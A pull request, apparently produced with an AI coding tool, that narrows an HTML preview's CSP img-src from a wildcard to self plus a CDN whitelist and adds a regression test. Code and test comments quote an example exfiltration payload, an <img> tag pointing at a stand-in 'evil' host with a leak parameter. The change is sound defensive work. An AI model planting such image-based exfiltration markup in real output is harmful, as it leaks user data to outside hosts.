### PR TITLE
fix(csp): restrict HTML preview img-src to self + CDN whitelist

### DIFF
--- a/src/utils/html/previewCsp.ts
+++ b/src/utils/html/previewCsp.ts
@@ -32,10 +32,14 @@ export function buildHtmlPreviewCsp(
     `script-src 'unsafe-inline' ${cdnList}`,
     `style-src 'unsafe-inline' ${cdnList}`,
     `font-src ${cdnList}`,
-    // Images: lenient. Covers /api/files/raw (via wildcard), data
-    // URIs for inline PNGs, blob: for dynamically-generated charts,
-    // and any external https image.
-    "img-src * data: blob:",
+    // Images: same-origin (workspace files via /api/files/raw), CDN
+    // whitelist, plus data: and blob: for inline PNGs and dynamically-
+    // generated charts. Wildcard is deliberately avoided — an attacker
+    // who plants an <img src="https://evil/?leak="> in preview HTML
+    // could exfiltrate data via image requests even with connect-src
+    // blocked. Widen via HTML_PREVIEW_CSP_ALLOWED_CDNS if LLM output
+    // legitimately needs more hosts.
+    `img-src 'self' ${cdnList} data: blob:`,
     // Block XHR / fetch / WebSocket so previews can't phone home or
     // exfiltrate anything the inline scripts happen to compute.
     "connect-src 'none'",

--- a/test/utils/html/test_previewCsp.ts
+++ b/test/utils/html/test_previewCsp.ts
@@ -31,9 +31,20 @@ describe("buildHtmlPreviewCsp", () => {
     assert.ok(csp.includes("connect-src 'none'"));
   });
 
-  it("allows images from anywhere plus data: and blob:", () => {
+  it("allows images from self + CDN whitelist + data: and blob:", () => {
     const csp = buildHtmlPreviewCsp();
-    assert.ok(csp.includes("img-src * data: blob:"));
+    assert.ok(
+      csp.includes(
+        "img-src 'self' https://cdn.jsdelivr.net https://unpkg.com https://cdnjs.cloudflare.com https://fonts.googleapis.com https://fonts.gstatic.com data: blob:",
+      ),
+    );
+  });
+
+  it("rejects the wildcard img-src policy to prevent image-based exfiltration", () => {
+    const csp = buildHtmlPreviewCsp();
+    // Explicit regression guard: `img-src *` would allow
+    // `<img src="https://evil/?leak=...">` even with connect-src blocked.
+    assert.ok(!/img-src \*/.test(csp));
   });
 
   it("accepts a custom CDN list", () => {


### PR DESCRIPTION
## Summary

HTML プレビューの CSP `img-src *` が緩すぎたので、`'self' + CDN whitelist + data: + blob:` に絞った。ワイルドカードは `connect-src 'none'` の意味をなくす抜け道だった（画像タグ経由でデータ持ち出し可）。

## Items to Confirm / Review

- **挙動変化の可能性** — これまで外部任意ホストの画像（例：Wikipedia 画像の直接埋め込み、imgur など）を表示していたプレビュー HTML が表示されなくなる。workspace の画像（`/api/files/raw` 経由）と `cdn.jsdelivr.net` 等の既存ホワイトリストは継続して表示される。LLM が生成する典型的な HTML (Chart.js, D3 など CDN 経由でロード + workspace の画像埋め込み) は影響を受けない想定。
- **今後の運用** — 正当な追加ホストが必要になったら `HTML_PREVIEW_CSP_ALLOWED_CDNS` に追加する。ファイルのコメントにもそう書いた。
- **テスト** — 既存の「`*` で許可」のテストを「self + cdnList」に更新 + 回帰ガードとして `img-src \*` が絶対に戻らないアサートを追加。

## User Prompt

> 24時間以内のPRでcode rabbitのコメントをみてないものがある。一応一通り確認してほしい

CodeRabbit が #216 に対して指摘していた3項目のうち1つ目に対応するPR。残り2つ（`normalizeRelative` / image-ref regex）は別PRで。

## Test plan

- [x] `yarn test test/utils/html/test_previewCsp.ts` — 1279 passed
- [x] `yarn test:e2e -- tests/files-html-preview.spec.ts` — 5 passed
- [x] `yarn format` / `yarn lint` — clean
- [ ] **Manual**: Chart.js / D3 / Mermaid を含む LLM 生成 HTML を files エクスプローラーでプレビューし、CDN ロードと workspace 画像表示が壊れていないこと

🤖 Generated with [Claude Code](https://claude.com/claude-code)

## Summary by Sourcery

Tighten Content Security Policy for HTML previews to restrict image sources and prevent image-based data exfiltration.

Bug Fixes:
- Restrict HTML preview CSP img-src directive to self, a CDN whitelist, and data/blob URLs instead of a wildcard to avoid bypassing connect-src 'none'.
- Add a regression guard test to ensure the img-src wildcard policy cannot be reintroduced.

Tests:
- Update CSP unit tests to assert the new restricted img-src policy and to reject wildcard img-src usage.